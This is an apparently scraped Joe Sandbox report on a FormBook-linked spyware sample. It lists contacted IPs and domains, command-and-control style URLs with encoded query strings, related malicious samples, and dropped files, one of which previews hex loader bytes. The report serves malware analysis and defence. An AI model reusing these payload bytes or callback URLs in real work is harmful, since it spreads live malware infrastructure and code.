                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://reg.runetbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsnetbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.reg.ru/whois/?check=&dname=www.b301.space&amp;reg_source=parking_autonetbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHnetbtugc.exe, 00000004.00000002.3855652610.000000000485A000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.000000000387A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://track.uc.cn/collectnetbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://push.zhanzhang.baidu.com/push.jsnetbtugc.exe, 00000004.00000002.3855652610.00000000059A0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000049C0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000004.00000002.3855652610.0000000004B7E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003B9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://hm.baidu.com/hm.js?netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&amnetbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://donnavariedades.com/fo8o?Zl4h1=lnetbtugc.exe, 00000004.00000002.3855652610.00000000051C6000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000041E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsnetbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.cssnetbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://download.quark.cn/download/quarkpc?platform=android&ch=pcquarknetbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWinetbtugc.exe, 00000004.00000002.3855652610.000000000485A000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.000000000387A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.reg.ru/domain/new/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_new&netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://zz.bdstatic.com/linksubmit/push.jsnetbtugc.exe, 00000004.00000002.3855652610.00000000059A0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000049C0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_servenetbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campanetbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.jsnetbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.sedo.com/services/parking.php3hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003B9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000004.00000002.3855652610.0000000004EA2000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003EC2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000004.00000002.3855652610.0000000004EA2000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003EC2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.goldenjade-travel.com/fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMhKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000036E8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.empowermedeco.com/fo8o/?Zl4h1=mxnRnetbtugc.exe, 00000004.00000002.3855652610.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.000000000450A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://www.reg.ru/web-sites/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_cms&anetbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.b301.spacehKABgfptdlPzDLVJYF.exe, 00000006.00000002.3854245040.0000000002A81000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    91.195.240.94
                                                    		www.rssnewscast.comGermany
                                                    		47846SEDO-ASDEfalse
                                                    34.111.148.214
                                                    		www.660danm.topUnited States
                                                    		15169GOOGLEUSfalse
                                                    116.50.37.244
                                                    		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                    		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                    23.227.38.74
                                                    		shops.myshopify.comCanada
                                                    		13335CLOUDFLARENETUSfalse
                                                    85.159.66.93
                                                    		natroredirect.natrocdn.comTurkey
                                                    		34619CIZGITRfalse
                                                    202.172.28.202
                                                    		www.kasegitai.tokyoJapan37907DIGIROCKDigiRockIncJPfalse
                                                    66.29.149.46
                                                    		www.techchains.infoUnited States
                                                    		19538ADVANTAGECOMUSfalse
                                                    104.206.198.212
                                                    		www.shenzhoucui.comUnited States
                                                    		62904EONIX-COMMUNICATIONS-ASBLOCK-62904USfalse
                                                    154.215.72.110
                                                    		www.3xfootball.comSeychelles
                                                    		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                    195.110.124.133
                                                    		elettrosistemista.zipItaly
                                                    		39729REGISTER-ASITfalse
                                                    194.58.112.174
                                                    		www.b301.spaceRussian Federation
                                                    		197695AS-REGRUfalse
                                                    46.30.213.191
                                                    		www.antonio-vivaldi.mobiDenmark
                                                    		51468ONECOMDKfalse
                                                    217.196.55.202
                                                    		empowermedeco.comNorway
                                                    		29300AS-DIRECTCONNECTNOfalse

                                                    General Information

                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1454256
                                                    Start date and time:2024-06-09 17:58:12 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 10m 50s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:13
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:opp46lGmxd.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:0f399d1b3a7c6dd28867095c2bdb2098.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/5@16/13
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 91%
                                                    • Number of executed functions: 59
                                                    • Number of non-executed functions: 271
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    12:00:11API Interceptor11298663x Sleep call for process: netbtugc.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    91.195.240.94mzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                                    • www.rssnewscast.com/fo8o/
                                                    j5Gx6UXYOm.exeGet hashmaliciousFormBookBrowse
                                                    • www.rssnewscast.com/fo8o/
                                                    5fG4r07BPy.exeGet hashmaliciousFormBookBrowse
                                                    • www.rssnewscast.com/fo8o/
                                                    eGHWPCyhLI.exeGet hashmaliciousFormBookBrowse
                                                    • www.rssnewscast.com/fo8o/
                                                    Z1glGeDwjL.exeGet hashmaliciousFormBookBrowse
                                                    • www.rssnewscast.com/fo8o/
                                                    9KBARIRa8X.exeGet hashmaliciousFormBookBrowse
                                                    • www.rssnewscast.com/fo8o/
                                                    N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                    • www.rssnewscast.com/fo8o/?aZ=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&qD=FrMTb
                                                    13820099132-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • www.rssnewscast.com/fo8o/
                                                    13820099133-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • www.rssnewscast.com/fo8o/
                                                    Utility R.lnkGet hashmaliciousFormBookBrowse
                                                    • www.rssnewscast.com/fo8o/
                                                    116.50.37.244mzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                                    • www.goldenjade-travel.com/fo8o/
                                                    j5Gx6UXYOm.exeGet hashmaliciousFormBookBrowse
                                                    • www.goldenjade-travel.com/fo8o/
                                                    5fG4r07BPy.exeGet hashmaliciousFormBookBrowse
                                                    • www.goldenjade-travel.com/fo8o/
                                                    eGHWPCyhLI.exeGet hashmaliciousFormBookBrowse
                                                    • www.goldenjade-travel.com/fo8o/
                                                    Z1glGeDwjL.exeGet hashmaliciousFormBookBrowse
                                                    • www.goldenjade-travel.com/fo8o/
                                                    9KBARIRa8X.exeGet hashmaliciousFormBookBrowse
                                                    • www.goldenjade-travel.com/fo8o/
                                                    N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                    • www.goldenjade-travel.com/fo8o/?qD=FrMTb&aZ=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=
                                                    13820099132-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • www.goldenjade-travel.com/fo8o/
                                                    13820099133-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • www.goldenjade-travel.com/fo8o/
                                                    Utility R.lnkGet hashmaliciousFormBookBrowse
                                                    • www.goldenjade-travel.com/fo8o/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    natroredirect.natrocdn.commzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    Yemenittiskes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 85.159.66.93
                                                    j5Gx6UXYOm.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    5fG4r07BPy.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    eGHWPCyhLI.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    Z1glGeDwjL.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    9KBARIRa8X.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    13820099132-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    13820099133-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    www.kasegitai.tokyomzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                                    • 202.172.28.202
                                                    j5Gx6UXYOm.exeGet hashmaliciousFormBookBrowse
                                                    • 202.172.28.202
                                                    5fG4r07BPy.exeGet hashmaliciousFormBookBrowse
                                                    • 202.172.28.202
                                                    eGHWPCyhLI.exeGet hashmaliciousFormBookBrowse
                                                    • 202.172.28.202
                                                    Z1glGeDwjL.exeGet hashmaliciousFormBookBrowse
                                                    • 202.172.28.202
                                                    9KBARIRa8X.exeGet hashmaliciousFormBookBrowse
                                                    • 202.172.28.202
                                                    N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                    • 202.172.28.202
                                                    13820099132-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • 202.172.28.202
                                                    13820099133-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • 202.172.28.202
                                                    Utility R.lnkGet hashmaliciousFormBookBrowse
                                                    • 202.172.28.202
                                                    shops.myshopify.commzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    Yemenittiskes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 23.227.38.74
                                                    j5Gx6UXYOm.exeGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    5fG4r07BPy.exeGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    eGHWPCyhLI.exeGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    Z1glGeDwjL.exeGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    9KBARIRa8X.exeGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    13820099132-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    13820099133-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    DONGFONG-TWDongFongTechnologyCoLtdTWmzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                                    • 116.50.37.244
                                                    j5Gx6UXYOm.exeGet hashmaliciousFormBookBrowse
                                                    • 116.50.37.244
                                                    5fG4r07BPy.exeGet hashmaliciousFormBookBrowse
                                                    • 116.50.37.244
                                                    eGHWPCyhLI.exeGet hashmaliciousFormBookBrowse
                                                    • 116.50.37.244
                                                    Z1glGeDwjL.exeGet hashmaliciousFormBookBrowse
                                                    • 116.50.37.244
                                                    9KBARIRa8X.exeGet hashmaliciousFormBookBrowse
                                                    • 116.50.37.244
                                                    N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                    • 116.50.37.244
                                                    13820099132-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • 116.50.37.244
                                                    13820099133-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • 116.50.37.244
                                                    Utility R.lnkGet hashmaliciousFormBookBrowse
                                                    • 116.50.37.244
                                                    CIZGITRmzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    j5Gx6UXYOm.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    5fG4r07BPy.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    eGHWPCyhLI.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    Z1glGeDwjL.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    9KBARIRa8X.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    13820099132-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    13820099133-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • 85.159.66.93
                                                    cbIcBAgY5W.exeGet hashmaliciousSystemBCBrowse
                                                    • 94.73.188.24
                                                    SEDO-ASDEmzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.94
                                                    Yemenittiskes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 91.195.240.19
                                                    Brudstyrken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 91.195.240.19
                                                    j5Gx6UXYOm.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.94
                                                    5fG4r07BPy.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.94
                                                    eGHWPCyhLI.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.94
                                                    Z1glGeDwjL.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.94
                                                    9KBARIRa8X.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.94
                                                    N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.94
                                                    13820099132-PHOTO.lnkGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.94
                                                    CLOUDFLARENETUSmzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    Purchase Order #PO-240902.vbsGet hashmaliciousFormBookBrowse
                                                    • 188.114.96.3
                                                    txxXmxvqsH.exeGet hashmaliciousLummaCBrowse
                                                    • 188.114.96.3
                                                    Yemenittiskes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 172.67.205.56
                                                    https://documentshared.transfernow.net/en/bld?utm_source=202406077EMP6zVFGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    ShaderifyBeta 1.4.0.exeGet hashmaliciousUnknownBrowse
                                                    • 104.26.13.205
                                                    ShaderifyBeta 1.4.0.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.74.152
                                                    SecuriteInfo.com.Win32.Evo-gen.11892.21025.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.66.98
                                                    SecuriteInfo.com.Win32.Evo-gen.11892.21025.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.66.98
                                                    https://mephedrone.top/Get hashmaliciousUnknownBrowse
                                                    • 188.114.96.3

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\netbtugc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1209935793793442
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                    MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                    SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                    SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                    SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\atule

                                                    Download File
                                                    Process:C:\Users\user\Desktop\opp46lGmxd.exe
                                                    File Type:ASCII text, with very long lines (28714), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):28714
                                                    Entropy (8bit):3.5935727706886857
                                                    Encrypted:false
                                                    SSDEEP:768:DiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbiE+Ik6Ng4vfF3if6gyz:DiTZ+2QoioGRk6ZklputwjpjBkCiw2Rd
                                                    MD5:5499511E60E5982057F824140A3CC1B6
                                                    SHA1:CBFEA12068FD4328BE23B22D8E15F4C1872E52A1
                                                    SHA-256:535664E59823A1AFD917846F38D8ABBEB6E95E83108D3A5965E1C18451EAF061
                                                    SHA-512:7D1131C3F9D43647CB07C06BE8130D5196EB4017664F9CF3604DAA674E27E027A97B67883DDFD643C6AD082256AA47C9D2458E613B904DB55EBD86EBE62EDEB3
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:8BCE895DD08975C8663BC2772D8B5F0C8BD08BFE0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c0000006689857e

                                                    C:\Users\user\AppData\Local\Temp\aut908D.tmp

                                                    Download File
